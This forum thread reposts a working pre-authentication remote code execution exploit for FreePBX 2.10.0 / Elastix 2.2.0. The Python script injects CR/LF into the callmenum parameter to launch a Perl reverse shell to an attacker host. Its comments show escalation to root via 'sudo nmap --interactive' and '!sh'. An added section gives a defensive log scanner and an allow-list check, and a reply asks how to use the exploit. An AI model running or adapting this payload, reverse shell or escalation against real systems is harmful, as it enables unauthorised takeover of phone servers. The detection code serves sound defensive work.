The_Arhitect Posted March 24, 2012

FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit

```python
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2010
# Author: muts
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
import urllib
rhost="172.16.254.72"
lhost="172.16.254.223"
lport=443
extension="1000"

# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)

# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
```

Source: FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit
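For defenders, the request in the post above is recognisable in web server logs by percent-encoded CR/LF sequences inside the `callmenum` parameter of `callme_page.php`. The following is an added detection example, not part of the original post or of the FreePBX/Elastix code base; it assumes combined-format access logs, the log lines are constructed sample data, and the dial-string allow-list is an assumption about what a legitimate value looks like.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (sample data, not taken from a real server).
SAMPLE_LOG = """\
172.16.254.10 - - [24/Mar/2012:10:01:02 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000 HTTP/1.1" 200 512
172.16.254.223 - - [24/Mar/2012:10:05:40 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20CONSTRUCTED%0D%0A%0D%0A HTTP/1.1" 200 498
172.16.254.11 - - [24/Mar/2012:10:07:13 +0000] "GET /recordings/index.php HTTP/1.1" 200 2048
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate callmenum is a short dial string (digits, *, #).
SAFE_NUMBER = re.compile(r'^[0-9*#]{1,32}$')
TARGET_PATH = "/recordings/misc/callme_page.php"


def inspect(line):
    """Return (client, findings) for a suspicious callme_page.php request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.endswith(TARGET_PATH):
        return None
    findings = []
    # parse_qs percent-decodes values, so %0D%0A becomes a literal CR/LF here.
    for value in parse_qs(parts.query, keep_blank_values=True).get("callmenum", []):
        if "\r" in value or "\n" in value:
            findings.append("CR/LF in callmenum")
        elif not SAFE_NUMBER.match(value):
            findings.append("callmenum is not a plain dial string")
    return (client, findings) if findings else None


def scan(log_text):
    """Run inspect() over every line and keep only the hits."""
    return [hit for hit in map(inspect, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for client, findings in scan(SAMPLE_LOG):
        print(client, "; ".join(findings))
```

The same allow-list check, applied server-side to `callmenum` before it is used, rejects the injected value outright.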
BloodLust Posted August 13, 2012

How is it used, if some details could be given?